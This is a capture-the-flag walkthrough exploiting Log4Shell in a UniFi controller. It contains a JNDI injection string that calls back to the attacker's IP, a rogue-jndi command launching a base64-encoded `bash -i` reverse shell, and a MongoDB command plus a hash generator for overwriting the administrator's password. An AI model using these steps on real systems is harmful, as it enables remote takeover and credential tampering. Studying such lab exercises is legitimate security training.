Unified
#Linux
#Web
#CVE
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open ibm-db2-admin?
8080/tcp open http-proxy
8443/tcp open ssl/nagios-nsca Nagios NSCA
UniFi 6.4.54 exploit
The article discusses CVE-2021-44228 (Log4Shell).
Next step: exploit the login page with Burp Suite.
Edit the JSON field `remember` in the login request
(why?) and set it to "${jndi:ldap://{tun0 IP address}/whatever}"
(how?)
JNDI
is the acronym for the Java Naming and Directory Interface API. By making calls to this API, applications locate resources and other program objects. A resource is a program object that provides connections to systems such as database servers and messaging systems. The `${jndi:...}` lookup above makes the application resolve an attacker-supplied name, which is the core of Log4Shell.
LDAP
is the acronym for Lightweight Directory Access Protocol, an open, vendor-neutral, industry-standard application protocol for accessing and maintaining distributed directory information services over the Internet or a network. The default port LDAP runs on is 389.
Because the server responds to the injected request, the system looks vulnerable (the response alone is only a hint; the callback below is the real confirmation).
Try packet analysis: capture traffic on the tun0 interface for LDAP (port 389).
The capture shows the target trying to connect back to us, which means the system is vulnerable.
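The connect-back can be confirmed with more than a packet capture. Below is an added example (my own code, not from these notes and not part of rogue-jndi): a small LDAP listener that decodes the BindRequest a Java JNDI client sends when it resolves ldap://HOST/whatever, answers it with a success BindResponse so the client continues, and then logs the SearchRequest whose base DN is the path from the injected URL. Using a different path per injection point therefore tells you which field fired. The sample messages are constructed by hand for the offline test; the port and the "whatever" path are the notes' own placeholders.

```python
"""Minimal LDAP callback listener for confirming a JNDI lookup (added example)."""
import socket

LDAP_OPS = {0: "bindRequest", 1: "bindResponse", 2: "unbindRequest", 3: "searchRequest"}


def ber(tag: int, payload: bytes) -> bytes:
    """Encode one BER TLV; used to build the reply and the test samples."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def parse_tlv(data: bytes, pos: int = 0):
    """Decode one BER TLV at pos; returns (tag, value, position after it)."""
    tag, length = data[pos], data[pos + 1]
    pos += 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    return tag, data[pos:pos + length], pos + length


def parse_ldap_message(data: bytes) -> dict:
    """Pick out message id, operation and the DN from one LDAPMessage."""
    tag, body, _ = parse_tlv(data)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage (outer tag must be SEQUENCE)")
    tag, msg_id, pos = parse_tlv(body)
    if tag != 0x02:
        raise ValueError("messageID must be an INTEGER")
    op_tag, op_body, _ = parse_tlv(body, pos)
    op = op_tag & 0x1F                    # APPLICATION tag number = operation
    info = {"message_id": int.from_bytes(msg_id, "big"),
            "op": LDAP_OPS.get(op, f"application-{op}")}
    if op == 0:                            # BindRequest: version, name, auth
        _, version, pos = parse_tlv(op_body)
        _, name, _ = parse_tlv(op_body, pos)
        info["version"] = int.from_bytes(version, "big")
        info["name"] = name.decode(errors="replace")
    elif op == 3:                          # SearchRequest: baseObject comes first
        _, base_dn, _ = parse_tlv(op_body)
        info["base_dn"] = base_dn.decode(errors="replace")
    return info


def bind_response(msg_id: int) -> bytes:
    """BindResponse with resultCode success(0) so the client goes on to search."""
    mid = msg_id.to_bytes(msg_id.bit_length() // 8 + 1, "big")
    return ber(0x30, ber(0x02, mid)
               + ber(0x61, ber(0x0A, b"\x00") + ber(0x04, b"") + ber(0x04, b"")))


# Constructed samples (not captured traffic): anonymous bind, then a search
# whose base DN is the "whatever" path of ldap://HOST/whatever.
SAMPLE_BIND = ber(0x30, ber(0x02, b"\x01")
                  + ber(0x60, ber(0x02, b"\x03") + ber(0x04, b"") + ber(0x80, b"")))
SAMPLE_SEARCH = ber(0x30, ber(0x02, b"\x02")
                    + ber(0x63, ber(0x04, b"whatever") + ber(0x0A, b"\x00")
                          + ber(0x0A, b"\x03") + ber(0x02, b"\x00") + ber(0x02, b"\x00")
                          + ber(0x01, b"\x00") + ber(0x87, b"objectClass") + ber(0x30, b"")))


def serve(port: int = 389, once: bool = True) -> None:
    """Accept callbacks, log peer and decoded request, answer only the bind."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen()
        while True:
            conn, (ip, sport) = srv.accept()
            with conn:
                conn.settimeout(3)
                try:
                    data = conn.recv(4096)
                    while data:
                        msg = parse_ldap_message(data)
                        print(f"[+] callback from {ip}:{sport}: {msg}")
                        if msg["op"] == "bindRequest":
                            conn.sendall(bind_response(msg["message_id"]))
                        _, _, end = parse_tlv(data)
                        data = data[end:] or conn.recv(4096)
                except (socket.timeout, ValueError, IndexError) as e:
                    print(f"[-] {ip}:{sport}: {e}")
            if once:
                break


if __name__ == "__main__":
    serve()   # port 389 needs root; run beside: tcpdump -i tun0 port 389
```

No SearchResultEntry is ever returned, so the target's lookup fails harmlessly; this is purely a detector, the exploitation server is still rogue-jndi.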
Next, build the payload to send to the target application.
# needed to run Java applications
sudo apt update
sudo apt install openjdk-11-jdk
sudo apt install maven
# the rogue LDAP server the target will connect to
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package
rogue-jndi/target/RogueJndi-1.1.jar
Build the payload as base64 so quoting and encoding issues don't mangle it.
Example: listener on port 4444.
Run Rogue-JNDI:
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<BASE64 STRING HERE>}|{base64,-d}|{bash,-i}" --hostname "<your_ip>"
Start a listener on port 4444.
Go back to Burp Suite and change the request so the JNDI URL points at the Rogue-JNDI server.
Back on the listener:
we have a shell as a user. Next, look for privilege escalation.
Check MongoDB (port 27117),
which may yield credentials.
Change the administrator's password hash:
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<SHA_512 Hash Generated>"}})'
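The `x_shadow` value in that update is a crypt(3) SHA-512 string (`$6$salt$hash`), the format `mkpasswd -m sha-512` and `openssl passwd -6` produce. As an added example (my own code, not from the notes or from UniFi), here is a pure-Python implementation of that scheme, so the hash can be generated and verified offline before it is written to MongoDB. The `x_shadow` field name and the 27117 port come from the notes; the "Hello world!"/"saltstring" pair is the scheme's published test vector; "Password1234" is a placeholder.

```python
"""sha512-crypt ($6$...) generator/verifier for the x_shadow field (added example)."""
import hashlib
import secrets

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Order in which the 64 digest bytes are emitted; fixed by the scheme.
PERM = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
        (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
        (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
        (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
        (62, 20, 41)]


def _b64(word: int, nchars: int) -> str:
    """crypt-style base64: 6 bits at a time, least significant group first."""
    out = []
    for _ in range(nchars):
        out.append(ITOA64[word & 0x3F])
        word >>= 6
    return "".join(out)


def _repeat_to(block: bytes, length: int) -> bytes:
    return block * (length // 64) + block[:length % 64]


def sha512_crypt(password: str, salt: str, rounds: int = 5000) -> str:
    pw, salt = password.encode(), salt[:16]           # salt is capped at 16 chars
    s = salt.encode()
    digest_b = hashlib.sha512(pw + s + pw).digest()
    ctx_a = hashlib.sha512(pw + s)
    n = len(pw)
    while n > 64:                                     # mix B in, password-length bytes
        ctx_a.update(digest_b)
        n -= 64
    ctx_a.update(digest_b[:n])
    n = len(pw)
    while n > 0:                                      # bits of len(pw), LSB first
        ctx_a.update(digest_b if n & 1 else pw)
        n >>= 1
    digest_a = ctx_a.digest()
    p_seq = _repeat_to(hashlib.sha512(pw * len(pw)).digest(), len(pw))
    s_seq = _repeat_to(hashlib.sha512(s * (16 + digest_a[0])).digest(), len(s))
    c = digest_a
    for i in range(rounds):                           # the slow, iterated part
        ctx = hashlib.sha512(p_seq if i & 1 else c)
        if i % 3:
            ctx.update(s_seq)
        if i % 7:
            ctx.update(p_seq)
        ctx.update(c if i & 1 else p_seq)
        c = ctx.digest()
    encoded = "".join(_b64((c[x] << 16) | (c[y] << 8) | c[z], 4) for x, y, z in PERM)
    encoded += _b64(c[63], 2)
    prefix = "$6$" if rounds == 5000 else f"$6$rounds={rounds}$"
    return f"{prefix}{salt}${encoded}"


def new_x_shadow(password: str) -> str:
    """Fresh random 16-char salt, the way mkpasswd picks one."""
    salt = "".join(secrets.choice(ITOA64) for _ in range(16))
    return sha512_crypt(password, salt)


def verify(password: str, stored: str) -> bool:
    """Recompute using the salt (and rounds, if present) embedded in the hash."""
    parts = stored.split("$")             # ['', '6', ['rounds=N',] salt, hash]
    rounds = 5000
    if parts[2].startswith("rounds="):
        rounds = int(parts[2][7:])
        parts.pop(2)
    return sha512_crypt(password, parts[2], rounds) == stored


if __name__ == "__main__":
    h = new_x_shadow("Password1234")      # placeholder password
    print(h)                              # paste into the x_shadow $set above
    print(verify("Password1234", h))
```

The loop runs 5000 SHA-512 compressions per attempt, which is the whole point of the scheme: it is why cracking a dumped `x_shadow` is slow and why, in this box, rewriting the hash is cheaper than cracking the existing one.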
Check again if needed.
Log in to the website and go to Settings -> Site.
SSH authentication settings (the SSH credentials are configured here).